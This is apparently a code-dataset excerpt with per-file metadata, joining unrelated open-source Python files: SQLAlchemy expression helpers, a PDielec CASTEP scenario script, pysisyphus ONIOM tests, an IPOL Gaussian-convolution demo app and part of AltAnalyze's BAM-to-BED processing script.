elif isinstance(element, (util.NoneType, bool)):
return _const_expr(element)
else:
raise exc.ArgumentError(
"SQL expression object or string expected, got object of type %r "
"instead" % type(element)
)
def _no_literals(element):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
raise exc.ArgumentError("Ambiguous literal: %r. Use the 'text()' "
"function to indicate a SQL expression "
"literal, or 'literal()' to indicate a "
"bound value." % element)
else:
return element
def _is_literal(element):
return not isinstance(element, Visitable) and \
not hasattr(element, '__clause_element__')
def _only_column_elements_or_none(element, name):
if element is None:
return None
else:
return _only_column_elements(element, name)
def _only_column_elements(element, name):
if hasattr(element, '__clause_element__'):
element = element.__clause_element__()
if not isinstance(element, ColumnElement):
raise exc.ArgumentError(
"Column-based expression object expected for argument "
"'%s'; got: '%s', type %s" % (name, element, type(element)))
return element
def _literal_as_binds(element, name=None, type_=None):
if hasattr(element, '__clause_element__'):
return element.__clause_element__()
elif not isinstance(element, Visitable):
if element is None:
return Null()
else:
return BindParameter(name, element, type_=type_, unique=True)
else:
return element
_guess_straight_column = re.compile(r'^\w\S*$', re.I)
def _interpret_as_column_or_from(element):
if isinstance(element, Visitable):
return element
elif hasattr(element, '__clause_element__'):
return element.__clause_element__()
insp = inspection.inspect(element, raiseerr=False)
if insp is None:
if isinstance(element, (util.NoneType, bool)):
return _const_expr(element)
elif hasattr(insp, "selectable"):
return insp.selectable
# be forgiving as this is an extremely common
# and known expression
if element == "*":
guess_is_literal = True
elif isinstance(element, (numbers.Number)):
return ColumnClause(str(element), is_literal=True)
else:
element = str(element)
# give into temptation, as this fact we are guessing about
# is not one we've previously ever needed our users tell us;
# but let them know we are not happy about it
guess_is_literal = not _guess_straight_column.match(element)
util.warn_limited(
"Textual column expression %(column)r should be "
"explicitly declared with text(%(column)r), "
"or use %(literal_column)s(%(column)r) "
"for more specificity",
{
"column": util.ellipses_string(element),
"literal_column": "literal_column"
if guess_is_literal else "column"
})
return ColumnClause(
element,
is_literal=guess_is_literal)
def _const_expr(element):
if isinstance(element, (Null, False_, True_)):
return element
elif element is None:
return Null()
elif element is False:
return False_()
elif element is True:
return True_()
else:
raise exc.ArgumentError(
"Expected None, False, or True"
)
def _type_from_args(args):
for a in args:
if not a.type._isnull:
return a.type
else:
return type_api.NULLTYPE
def _corresponding_column_or_error(fromclause, column,
require_embedded=False):
c = fromclause.corresponding_column(column,
require_embedded=require_embedded)
if c is None:
raise exc.InvalidRequestError(
"Given column '%s', attached to table '%s', "
"failed to locate a corresponding column from table '%s'"
%
(column,
getattr(column, 'table', None),
fromclause.description)
)
return c
class AnnotatedColumnElement(Annotated):
def __init__(self, element, values):
Annotated.__init__(self, element, values)
ColumnElement.comparator._reset(self)
for attr in ('name', 'key', 'table'):
if self.__dict__.get(attr, False) is None:
self.__dict__.pop(attr)
def _with_annotations(self, values):
clone = super(AnnotatedColumnElement, self)._with_annotations(values)
ColumnElement.comparator._reset(clone)
return clone
@util.memoized_property
def name(self):
"""pull 'name' from parent, if not present"""
return self._Annotated__element.name
@util.memoized_property
def table(self):
"""pull 'table' from parent, if not present"""
return self._Annotated__element.table
@util.memoized_property
def key(self):
"""pull 'key' from parent, if not present"""
return self._Annotated__element.key
@util.memoized_property
def info(self):
return self._Annotated__element.info
@util.memoized_property
def anon_label(self):
return self._Annotated__element.anon_label
|
gdimitris/FleetManagerBackend
|
virtual_env/lib/python2.7/site-packages/sqlalchemy/sql/elements.py
|
Python
|
mit
| 133,000
|
[
"VisIt"
] |
f91cd08116cfb4a31ba1631d597833d2dfb342b366d84b1f79a6a276ca8ad51c
|
#
# mainTab
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
#
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
tab.settings['Excel file name'] = ''
tab.settings['QM program'] = ''
#
#
tab = self.notebook.settingsTab
tab.settings['Eckart flag'] = False
tab.settings['Neutral Born charges'] = False
tab.settings['Sigma value'] = 10
tab.settings['Mass definition'] = 'average'
tab.sigmas_cm1 = [10, 10, 10, 10, 10, 10]
#
#
tab = self.notebook.scenarios[0]
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 3.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.1500292973489613
tab.settings['Volume fraction'] = 0.1
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 0.5
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Maxwell-Garnett'
tab.settings['Particle shape'] = 'Sphere'
tab.settings['Legend'] = 'Maxwell-Garnett vf=0.1 Sphere'
#
#
self.notebook.addScenario()
tab = self.notebook.scenarios[1]
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 3.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.24
tab.settings['Mass fraction'] = 0.19400144183816012
tab.settings['Volume fraction'] = 0.1
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 0.5
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 0
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Maxwell-Garnett'
tab.settings['Particle shape'] = 'Sphere'
tab.settings['Legend'] = 'Maxwell-Garnett bubbles'
#
#
tab = self.notebook.plottingTab
tab.settings['Minimum frequency'] = 0
tab.settings['Maximum frequency'] = 400
tab.settings['Frequency increment'] = 0.2
tab.settings['Molar definition'] = 'Unit cells'
tab.settings['Number of atoms'] = 1
tab.settings['Plot title'] = 'Castep MgO'
tab.settings['concentration'] = 86.71312720248292
#
#
tab = self.notebook.analysisTab
tab.settings['Minimum frequency'] = -1
tab.settings['Maximum frequency'] = 400
tab.settings['title'] = 'Analysis'
tab.settings['Covalent radius scaling'] = 1.1
tab.settings['Bonding tolerance'] = 0.1
tab.settings['Bar width'] = 0.5
#
#
tab = self.notebook.viewerTab
tab.settings['Atom scaling'] = 0.5
tab.settings['Maximum displacement'] = 1.0
tab.settings['Bond colour'] = [80, 80, 80, 255]
tab.settings['Bond radius'] = 0.1
tab.settings['Cell colour'] = [255, 0, 0, 255]
tab.settings['Cell radius'] = 0.1
tab.settings['Background colour'] = [120, 120, 120, 255]
tab.settings['Arrow colour'] = [0, 255, 0, 255]
tab.settings['Arrow radius'] = 0.07
tab.settings['Number of phase steps'] = 41
#
#
tab = self.notebook.fitterTab
tab.settings['Excel file name'] = ''
tab.settings['Plot title'] = 'Experimental and Calculated Spectral Comparison'
tab.settings['Plot type'] = 'Molar absorption'
tab.settings['Fitting type'] = 'Minimise x-correlation'
tab.settings['Number of iterations'] = 20
tab.settings['Frequency scaling'] = False
tab.settings['Frequency scaling factor'] = 1.0
tab.settings['Absorption scaling'] = False
tab.settings['Absorption scaling factor'] = 1.0
tab.settings['Independent y-axes'] = True
tab.settings['Spectral difference threshold'] = 0.05
tab.settings['HPFilter lambda'] = 7.0
tab.settings['Baseline removal'] = False
|
JohnKendrick/PDielec
|
Examples/Castep/Bubbles/script.py
|
Python
|
mit
| 4,195
|
[
"CASTEP"
] |
92d49e589ab91a40bf38bd4131e610e07e32cdb655a496bb253cec36c83f9ff6
|
import pytest
from pysisyphus.run import run_from_dict
from pysisyphus.testing import using
@pytest.mark.skip
@using("xtb")
def test_oniom_opt_big():
run_dict = {
"geom": {
"type": "redund",
# frag.py raffinose.xyz 21 14 33 10
"fn": "lib:birkholz/raffinose.xyz",
},
"calc": {
"type": "oniom",
"calcs": {
"real": {
"type": "xtb",
"gfn": 0,
"pal": 6,
"quiet": True,
},
"high": {
"type": "xtb",
"gfn": 2,
"pal": 6,
"quiet": True,
},
},
"models": {
"high": {
"inds": "11..21,33..36,50..57",
"calc": "high",
},
},
},
"opt": {
"thresh": "gau_loose",
},
}
results = run_from_dict(run_dict)
assert results.opt_geom.energy == pytest.approx(-110.75489874)
@using("xtb")
@pytest.mark.parametrize(
"opt_dict",
[
{
"type": "rfo",
},
{
"type": "lbfgs",
"line_search": True,
},
{
"type": "oniom",
},
],
ids=["rfo_ref", "lbfgs_ref", "oniom"],
)
def test_oniom_opt_small(opt_dict):
opt_dict.update({
"thresh": "gau",
"step": "full",
# "step": "high",
"dump": True,
})
run_dict = {
"geom": {"type": "cart", "fn": "lib:acetaldehyd_oniom.xyz"},
"calc": {
"type": "oniom",
"calcs": {
"real": {
"type": "xtb",
"gfn": 0,
"pal": 6,
"quiet": True,
},
"high": {
"type": "xtb",
"gfn": 2,
"pal": 6,
"quiet": True,
},
},
"models": {
"high": {
"inds": [4, 5, 6],
"calc": "high",
},
},
},
"opt": opt_dict,
}
results = run_from_dict(run_dict)
assert results.opt_geom.energy == pytest.approx(-10.419331913)
@pytest.mark.skip
def test_dmp():
run_dict = {
# "geom": {"type": "cart", "fn": "inp.xyz"},
"geom": {"type": "redund", "fn": "inp.xyz"},
"calc": {
"type": "oniom",
"calcs": {
"real": {
"type": "pyscf",
"basis": "sto3g",
"pal": 2,
"verbose": 0,
},
"high": {
"type": "pyscf",
"basis": "321g",
"pal": 2,
"verbose": 0,
},
},
"models": {
"high": {
"inds": [15, 14, 1, 0],
"calc": "high",
},
},
},
# "opt": {
# "type": "oniom",
# # "thresh": "gau_loose",
# "thresh": "gau",
# },
"opt": {"thresh": "gau"},
}
results = run_from_dict(run_dict)
# assert results.opt_geom.energy == pytest.approx(-10.419331913)
|
eljost/pysisyphus
|
tests_staging/test_oniom_opt/test_oniom_opt.py
|
Python
|
gpl-3.0
| 3,472
|
[
"PySCF",
"xTB"
] |
e286d71fc83e9b9b07ebe79ebd587bdc489b26ea37468e340d528c034070fe78
|
"""
Gaussian Convolution ipol demo web app
"""
from lib import base_app, build, http, image
from lib.misc import ctime
from lib.base_app import init_app
from lib.config import cfg_open
import shutil
import cherrypy
from cherrypy import TimeoutError
import os.path
import time
class app(base_app):
""" Gaussian Convolution app """
title = 'A Survey of Gaussian Convolution Algorithms'
input_nb = 1
input_max_pixels = 700 * 700 # max size (in pixels) of input image
input_max_weight = 10 * 1024 * 1024 # max size (in bytes) of input file
input_dtype = '3x8i' # input image expected data type
input_ext = '.png' # expected extension
is_test = False
xlink_article = "http://www.ipol.im/pub/pre/87/"
algos = ['fir', 'dct',
'box-3', 'box-4', 'box-5',
'ebox-3', 'ebox-4', 'ebox-5',
'sii-3', 'sii-4', 'sii-5',
'am-3', 'am-4', 'am-5',
'deriche-2', 'deriche-3', 'deriche-4',
'vyv-3', 'vyv-4', 'vyv-5']
default_param = {'sigma': '5.0', # default parameters
'algo' : 'fir dct',
'x0': None,
'y0': None,
'x' : None,
'y' : None}
def __init__(self):
"""
App setup
"""
# Setup the parent class
base_dir = os.path.dirname(os.path.abspath(__file__))
base_app.__init__(self, base_dir)
# Select the base_app steps to expose
# index() and input_xxx() are generic
base_app.index.im_func.exposed = True
base_app.input_select.im_func.exposed = True
base_app.input_upload.im_func.exposed = True
# params() is modified from the template
base_app.params.im_func.exposed = True
# result() is modified from the template
base_app.result.im_func.exposed = True
# Generate a new timestamp
self.timestamp = int(100*time.time())
def build(self):
"""
Program build/update
"""
# Store common file path in variables
archive = 'gaussian_20131215'
tgz_url = 'http://www.ipol.im/pub/art/2013/87/' + archive + '.tgz'
tgz_file = self.dl_dir + archive + '.tgz'
progs = ['gaussian_demo', 'imdiff']
src_bin = dict([(self.src_dir + os.path.join(archive, prog),
self.bin_dir + prog)
for prog in progs])
log_file = self.base_dir + 'build.log'
# Get the latest source archive
build.download(tgz_url, tgz_file)
# Test if any dest file is missing, or too old
if all([(os.path.isfile(bin_file)
and ctime(tgz_file) < ctime(bin_file))
for bin_file in src_bin.values()]):
cherrypy.log('not rebuild needed',
context='BUILD', traceback=False)
else:
# Extract the archive
build.extract(tgz_file, self.src_dir)
# Build the programs
build.run("make -C %s %s"
% (self.src_dir + archive, " ".join(progs))
+ " --makefile=makefile.gcc"
+ " CXX='ccache c++' -j4", stdout=log_file)
# Save into bin dir
if os.path.isdir(self.bin_dir):
shutil.rmtree(self.bin_dir)
os.mkdir(self.bin_dir)
for (src, dst) in src_bin.items():
shutil.copy(src, dst)
# Cleanup the source dir
shutil.rmtree(self.src_dir)
return
#
# PARAMETER HANDLING
#
@cherrypy.expose
@init_app
def params(self, newrun=False, msg=None):
"""
Configure the algo execution
"""
if newrun:
old_work_dir = self.work_dir
self.clone_input()
# Keep old parameters
self.cfg['param'] = cfg_open(old_work_dir
+ 'index.cfg', 'rb')['param']
# Also need to clone input_0_sel.png in case the user is running
# with new parameters but on the same subimage.
shutil.copy(old_work_dir + 'input_0_sel.png',
self.work_dir + 'input_0_sel.png')
# Set undefined parameters to default values
self.cfg['param'] = dict(self.default_param, **self.cfg['param'])
# Generate a new timestamp
self.timestamp = int(100 * time.time())
# Reset cropping parameters if running with a different subimage
if msg == 'different subimage':
self.cfg['param']['x0'] = None
self.cfg['param']['y0'] = None
self.cfg['param']['x'] = None
self.cfg['param']['y'] = None
self.cfg.save()
return self.tmpl_out('params.html')
@cherrypy.expose
@init_app
def wait(self, **kwargs):
"""
Run redirection
"""
# Read webpage parameters from kwargs, but only those that
# are defined in the default_param dict. If a parameter is not
# defined by kwargs, the value from default_param is used.
self.cfg['param'] = dict(self.default_param.items() +
[(p,kwargs[p]) for p in self.default_param.keys() if p in kwargs])
# Generate a new timestamp
self.timestamp = int(100 * time.time())
if not isinstance(self.cfg['param']['algo'], basestring):
self.cfg['param']['algo'] = ' '.join(self.cfg['param']['algo'])
self.cfg['param']['sigma'] = \
str(max(float(self.cfg['param']['sigma']), 0.5))
if not 'action' in kwargs:
# Select a subimage
x = self.cfg['param']['x']
y = self.cfg['param']['y']
x0 = self.cfg['param']['x0']
y0 = self.cfg['param']['y0']
if x != None and y != None:
img = image(self.work_dir + 'input_0.png')
if x0 == None or y0 == None:
# (x,y) specifies the first corner
(x0, y0, x, y) = (int(x), int(y), None, None)
# Draw a cross at the first corner
img.draw_cross((x0, y0), size=4, color="white")
img.draw_cross((x0, y0), size=2, color="red")
else:
# (x,y) specifies the second corner
(x0, x) = sorted((int(x0), int(x)))
(y0, y) = sorted((int(y0), int(y)))
assert (x - x0) > 0 and (y - y0) > 0
# Crop the image
# Check if the original image is a different size, which is
# possible if the input image is very large.
imgorig = image(self.work_dir + 'input_0.orig.png')
if imgorig.size != img.size:
s = float(imgorig.size[0])/float(img.size[0])
imgorig.crop(tuple([int(s*v) for v in (x0, y0, x, y)]))
img = imgorig
else:
img.crop((x0, y0, x, y))
img.save(self.work_dir + 'input_0_sel.png')
self.cfg['param']['x0'] = x0
self.cfg['param']['y0'] = y0
self.cfg['param']['x'] = x
self.cfg['param']['y'] = y
self.cfg.save()
return self.tmpl_out('params.html')
else:
if any(self.cfg['param'][p] == None \
for p in ['x0', 'y0', 'x', 'y']):
img0 = image(self.work_dir + 'input_0.png')
img0.save(self.work_dir + 'input_0_sel.png')
self.cfg.save()
http.refresh(self.base_url + 'run?key=%s' % self.key)
return self.tmpl_out("wait.html")
@cherrypy.expose
@init_app
def run(self):
"""
Algorithm execution
"""
# Run the algorithm
stdout = open(self.work_dir + 'stdout.txt', 'w')
try:
run_time = time.time()
self.run_algo(stdout=stdout)
self.cfg['info']['run_time'] = time.time() - run_time
self.cfg.save()
except TimeoutError:
return self.error(errcode='timeout')
except RuntimeError:
print "Run time error"
return self.error(errcode='runtime')
stdout.close()
http.redir_303(self.base_url + 'result?key=%s' % self.key)
# Archive
if self.cfg['meta']['original']:
ar = self.make_archive()
ar.add_file("input_0_sel.png",
info="selected subimage")
for algo in self.cfg['param']['algo'].split():
ar.add_file('output-' + algo + '.png',
info='output ' + algo)
ar.add_info({'sigma': self.cfg['param']['sigma']})
ar.add_info({'algorithm': self.cfg['param']['algo']})
ar.save()
return self.tmpl_out("run.html")
def run_algo(self, stdout=None):
"""
The core algo runner
could also be called by a batch processor
this one needs no parameter
"""
timeout = False
p = []
algo_list = [algo for algo in self.cfg['param']['algo'].split()
if algo in self.algos]
if len(algo_list) == 0:
algo_list = self.default_param['algo'].split()
sigma = float(self.cfg['param']['sigma'])
if sigma <= 2.0:
exact_algo = 'fir'
self.cfg['param']['exact_algo'] = (
'FIR, <i>tol</i>=10<sup>−15</sup>,')
else:
exact_algo = 'dct'
self.cfg['param']['exact_algo'] = 'DCT'
p.append(self.run_proc(['gaussian_demo',
'-s', str(sigma),
'-a', exact_algo,
'-t1e-15',
'input_0_sel.png', 'output-exact.png'],
stdout=stdout, stderr=stdout))
for algo in algo_list:
s = algo.split('-')
a = s[0]
K = '3'
if len(s) == 2:
K = s[1]
p.append(self.run_proc(['gaussian_demo',
'-s', str(sigma),
'-a' + a,
'-K' + K,
'input_0_sel.png', 'output-' + algo + '.png'],
stdout=stdout, stderr=stdout))
self.wait_proc(p, timeout)
# Compute metrics
self.wait_proc(
[self.run_proc(['imdiff',
'output-exact.png', 'output-' + algo + '.png'],
stdout=open(self.work_dir
+ 'metrics_' + algo + '.txt', 'w'), stderr=stdout)
for algo in algo_list], timeout)
# Read the metrics_*.txt files
for algo in algo_list:
try:
f = open(self.work_dir
+ 'metrics_' + algo + '.txt', 'r')
self.cfg['param'][algo + '_maxdiff'] = \
float(f.readline().split(':',1)[1])
self.cfg['param'][algo + '_rmse'] = \
float(f.readline().split(':',1)[1])
self.cfg['param'][algo + '_psnr'] = \
float(f.readline().split(':',1)[1])
f.close()
except Exception:
self.cfg['param'][algo + '_maxdiff'] = -1
self.cfg['param'][algo + '_rmse'] = -1
self.cfg['param'][algo + '_psnr'] = -1
self.cfg['param']['algo'] = ' '.join(algo_list)
self.cfg['param']['displayheight'] = max(50 + 40 * len(algo_list), \
image(self.work_dir + 'input_0_sel.png').size[1])
self.cfg.save()
@cherrypy.expose
@init_app
def result(self, public=None):
"""
Display the algo results
SHOULD be defined in the derived classes, to check the parameters
"""
return self.tmpl_out("result.html",
stdout = open(self.work_dir + 'stdout.txt', 'r').read())
|
juan-cardelino/matlab_demos
|
ipol_demo-light-1025b85/app_available/87/app.py
|
Python
|
gpl-2.0
| 12,250
|
[
"Gaussian"
] |
acd6e1c1773d1eff5717c97954caee031cf3a68e958c3727beb567f98e9bd802
|
### hierarchical_clustering.py
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
""" Batch script for extracting many junction.bed and building exon.bed files from
an input set of BAM files in a directory. Requires a reference text file containing
exon regions (currently provided from AltAnalyze - see ReferenceExonCoordinates
folder). Can produce only junction.bed files, only a combined exon reference or only
exon.bed files optionally. Can run using a single processor or multiple simultaneous
processes (--m flag)."""
import sys,string,os
sys.path.insert(1, os.path.join(sys.path[0], '..')) ### import parent dir dependencies
import export
import time
import shutil
import unique
import subprocess
from import_scripts import BAMtoJunctionBED
from import_scripts import BAMtoExonBED
import getopt
import traceback
################# General data import methods #################
def filepath(filename):
fn = unique.filepath(filename)
return fn
def cleanUpLine(line):
data = string.replace(line,'\n','')
data = string.replace(data,'\c','')
data = string.replace(data,'\r','')
data = string.replace(data,'"','')
return data
def getFolders(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' not in entry: dir_list2.append(entry)
return dir_list2
def getFiles(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' in entry: dir_list2.append(entry)
return dir_list2
def getFolders(sub_dir):
dir_list = unique.read_directory(sub_dir); dir_list2 = []
###Only get folder names
for entry in dir_list:
if '.' not in entry: dir_list2.append(entry)
return dir_list2
def parallelBAMProcessing(directory,refExonCoordinateFile,bed_reference_dir,
analysisType=[],useExonReads=False,useMultiProcessing=False,MLP=None,root=None):
paths_to_run=[]
errors=[]
if '.bam' in directory:
### Allow a single BAM file to be specifically analyzed (e.g., bsub operation)
bam_file = directory
bam_file = string.replace(directory,'\\','/')
directory = string.join(string.split(directory,'/')[:-1],'/')
else:
bam_file = None
outputExonCoordinateRefBEDfile = str(bed_reference_dir)
bed_reference_dir = string.replace(bed_reference_dir,'\\','/')
### Check if the BAM files are located in the target folder (not in subdirectories)
files = getFiles(directory)
for file in files:
if '.bam' in file and '.bai' not in file:
source_file = directory+'/'+file
source_file = filepath(source_file)
output_filename = string.replace(file,'.bam','')
output_filename = string.replace(output_filename,'=','_')
destination_file = directory+'/'+output_filename+'__exon.bed'
destination_file = filepath(destination_file)
paths_to_run.append((source_file,refExonCoordinateFile,bed_reference_dir,destination_file,useExonReads))
### Otherwise, check subdirectories for BAM files
folders = getFolders(directory)
if len(paths_to_run)==0:
for top_level in folders:
try:
files = getFiles(directory+'/'+top_level)
for file in files:
if '.bam' in file and '.bai' not in file:
source_file = directory+'/'+file
source_file = filepath(source_file)
destination_file = directory+'/'+top_level+'__exon.bed'
destination_file = filepath(destination_file)
paths_to_run.append((source_file,refExonCoordinateFile,bed_reference_dir,destination_file,useExonReads))
except Exception: pass
### If a single BAM file is indicated
if bam_file != None:
output_filename = string.replace(bam_file,'.bam','')
output_filename = string.replace(output_filename,'=','_')
destination_file = output_filename+'__exon.bed'
paths_to_run = [(bam_file,refExonCoordinateFile,bed_reference_dir,destination_file,useExonReads)]
if 'reference' in analysisType and len(analysisType)==1:
augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile)
sys.exit()
if useMultiProcessing:
pool_size = MLP.cpu_count()
if len(paths_to_run)<pool_size:
pool_size = len(paths_to_run)
print 'Using %d processes' % pool_size
if len(paths_to_run) > pool_size:
pool_size = len(paths_to_run)
if len(analysisType) == 0 or 'junction' in analysisType:
print 'Extracting junction alignments from BAM files...',
pool = MLP.Pool(processes=pool_size)
try: results = pool.map(runBAMtoJunctionBED, paths_to_run) ### worker jobs initiated in tandem
except ValueError:
print_out = '\WARNING!!! No Index found for the BAM files (.bam.bai). Sort and Index using Samtools prior to loading in AltAnalyze'
print traceback.format_exc()
if root!=None:
import UI
UI.WarningWindow(print_out,'Exit');sys.exit()
try:pool.close(); pool.join(); pool = None
except Exception: pass
print_out=None
for sample,missing in results:
if len(missing)>1:
print_out = '\nWarning!!! %s chromosomes not found in: %s (PySam platform-specific error)' % (string.join(missing,', '),sample)
if root!=None and print_out!=None:
try:
import UI
UI.WarningWindow(print_out,'Continue')
except Exception: pass
print len(paths_to_run), 'BAM files','processed'
if len(analysisType) == 0 or 'reference' in analysisType:
#print 'Building exon reference coordinates from Ensembl/UCSC and all junctions...',
augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile)
#print 'completed'
print 'Extracting exon alignments from BAM files...',
if len(analysisType) == 0 or 'exon' in analysisType:
pool = MLP.Pool(processes=pool_size)
results = pool.map(runBAMtoExonBED, paths_to_run) ### worker jobs initiated in tandem
try:pool.close(); pool.join(); pool = None
except Exception: pass
print len(paths_to_run), 'BAM files','processed'
else:
if len(analysisType) == 0 or 'junction' in analysisType:
for i in paths_to_run:
runBAMtoJunctionBED(i)
print '*',
print ''
if len(analysisType) == 0 or 'reference' in analysisType:
augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile)
if len(analysisType) == 0 or 'exon' in analysisType:
for i in paths_to_run:
runBAMtoExonBED(i)
print '*',
print ''
def runBAMtoJunctionBED(paths_to_run):
bamfile_dir,refExonCoordinateFile,bed_reference_dir,output_bedfile_path,useExonReads = paths_to_run
output_bedfile_path = string.replace(bamfile_dir,'.bam','__junction.bed')
#if os.path.exists(output_bedfile_path) == False: ### Only run if the file doesn't exist
results = BAMtoJunctionBED.parseJunctionEntries(bamfile_dir,multi=True,ReferenceDir=refExonCoordinateFile)
#else: print output_bedfile_path, 'already exists.'
return results
def runBAMtoExonBED(paths_to_run):
bamfile_dir,refExonCoordinateFile,bed_reference_dir,output_bedfile_path,useExonReads = paths_to_run
if useExonReads:
intronRetentionOnly = False
else:
intronRetentionOnly = True
if os.path.exists(output_bedfile_path) == False: ### Only run if the file doesn't exist
BAMtoExonBED.parseExonReferences(bamfile_dir,bed_reference_dir,multi=True,intronRetentionOnly=intronRetentionOnly)
else:
print output_bedfile_path, 'already exists... re-writing'
BAMtoExonBED.parseExonReferences(bamfile_dir,bed_reference_dir,multi=True,intronRetentionOnly=intronRetentionOnly)
def getChrFormat(directory):
### Determine if the chromosomes have 'chr' or nothing
files = getFiles(directory)
chr_status=True
for file in files:
firstLine=True
if 'junction' in file and '.bed' in file:
for line in open(directory+'/'+file,'rU').xreadlines():
if firstLine: firstLine=False
else:
t = string.split(line)
chr = t[0]
if 'chr' not in chr:
chr_status = False
break
break
return chr_status
def augmentExonReferences(directory,refExonCoordinateFile,outputExonCoordinateRefBEDfile):
print 'Building reference bed file from all junction.bed files'
splicesite_db={} ### reference splice-site database (we only want to add novel splice-sites to our reference)
real_splicesites={}
introns={}
novel_db={}
reference_toplevel = string.join(string.split(outputExonCoordinateRefBEDfile,'/')[:-1],'/')
try: os.mkdir(reference_toplevel) ### If the bed folder doesn't exist
except Exception: pass
chr_status = getChrFormat(directory)
o = open (outputExonCoordinateRefBEDfile,"w")
#refExonCoordinateFile = '/Users/saljh8/Desktop/Code/AltAnalyze/AltDatabase/EnsMart72/ensembl/Mm/Mm_Ensembl_exon.txt'
reference_rows=0
if '.gtf' in refExonCoordinateFile: firstLine = False
else: firstLine = True
for line in open(refExonCoordinateFile,'rU').xreadlines():
if firstLine: firstLine=False
else:
line = line.rstrip('\n')
reference_rows+=1
t = string.split(line,'\t'); #'gene', 'exon-id', 'chromosome', 'strand', 'exon-region-start(s)', 'exon-region-stop(s)', 'constitutive_call', 'ens_exon_ids', 'splice_events', 'splice_junctions'
geneID, exon, chr, strand, start, stop = t[:6]
if chr_status == False:
chr = string.replace(chr,'chr','')
o.write(string.join([chr,start,stop,geneID+':'+exon,'',strand],'\t')+'\n')
start = int(start); stop = int(stop)
#geneID = string.split(exon,':')[0]
splicesite_db[chr,start]=geneID
splicesite_db[chr,stop]=geneID
if 'I' in exon:
try: introns[geneID].append([start,stop])
except Exception: introns[geneID] = [[start,stop]]
files = getFiles(directory)
for file in files:
firstLine=True
if 'junction' in file and '.bed' in file:
for line in open(directory+'/'+file,'rU').xreadlines():
if firstLine: firstLine=False
else:
line = line.rstrip('\n')
t = string.split(line,'\t'); #'12', '6998470', '6998522', 'ENSG00000111671:E1.1_ENSE00001754003', '0', '-'
chr, exon1_start, exon2_stop, junction_id, reads, strand, null, null, null, null, lengths, null = t
exon1_len,exon2_len=string.split(lengths,',')[:2]; exon1_len = int(exon1_len); exon2_len = int(exon2_len)
exon1_start = int(exon1_start); exon2_stop = int(exon2_stop)
if strand == '-':
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
### Exons have the opposite order
a = exon1_start,exon1_stop; b = exon2_start,exon2_stop
exon1_stop,exon1_start = b; exon2_stop,exon2_start = a
else:
exon1_stop = exon1_start+exon1_len; exon2_start=exon2_stop-exon2_len+1
seq_length = abs(float(exon1_stop-exon2_start)) ### Junction distance
key = chr,exon1_stop,exon2_start
if (chr,exon1_stop) not in splicesite_db: ### record the splice site and position of the max read
if (chr,exon2_start) in splicesite_db: ### only include splice sites where one site is known
geneID = splicesite_db[(chr,exon2_start)]
novel_db[chr,exon1_stop,strand] = exon1_start,geneID,5
real_splicesites[chr,exon2_start]=None
elif (chr,exon2_start) not in splicesite_db: ### record the splice site and position of the max read
if (chr,exon1_stop) in splicesite_db: ### only include splice sites where one site is known
#if 121652702 ==exon2_start:
#print chr, exon1_start,exon1_stop,exon2_start,exon2_stop, strand;sys.exit()
geneID = splicesite_db[(chr,exon1_stop)]
novel_db[chr,exon2_start,strand] = exon2_stop,geneID,3
real_splicesites[chr,exon1_stop]=None
else:
real_splicesites[chr,exon1_stop]=None
real_splicesites[chr,exon2_start]=None
print len(novel_db), 'novel splice sites and', len(real_splicesites), 'known splice sites.'
gene_organized={}
for (chr,pos1,strand) in novel_db:
pos2,geneID,type = novel_db[(chr,pos1,strand)]
try: gene_organized[chr,geneID,strand].append([pos1,pos2,type])
except Exception: gene_organized[chr,geneID,strand] = [[pos1,pos2,type]]
